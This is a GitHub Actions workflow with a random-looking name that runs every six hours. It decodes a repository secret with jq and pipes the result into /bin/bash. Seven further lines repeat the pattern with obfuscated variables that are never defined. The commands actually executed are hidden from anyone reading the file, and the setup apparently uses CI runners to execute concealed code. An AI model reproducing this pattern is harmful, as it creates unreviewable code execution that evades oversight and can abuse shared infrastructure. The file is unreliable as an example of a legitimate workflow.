name: luyanxianga
on:
  workflow_dispatch:
  schedule:
    - cron: '34 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: luyanxianga
        env:
          tq674: ${{ secrets.tq674 }}
        run: |
          echo $tq674 | jq -r .cp3 | /bin/bash
          echo $f45 | jq -r .jol36760 | /bin/bash
          echo $s4927 | jq -r .tbqp52 | /bin/bash
          echo $wnmij30 | jq -r .hhrvn977 | /bin/bash
          echo $kk913 | jq -r .hn3 | /bin/bash
          echo $a95237 | jq -r .jalbj8 | /bin/bash
          echo $cef23614 | jq -r .bgkk7417 | /bin/bash
          echo $h3614 | jq -r .ftui8 | /bin/bash

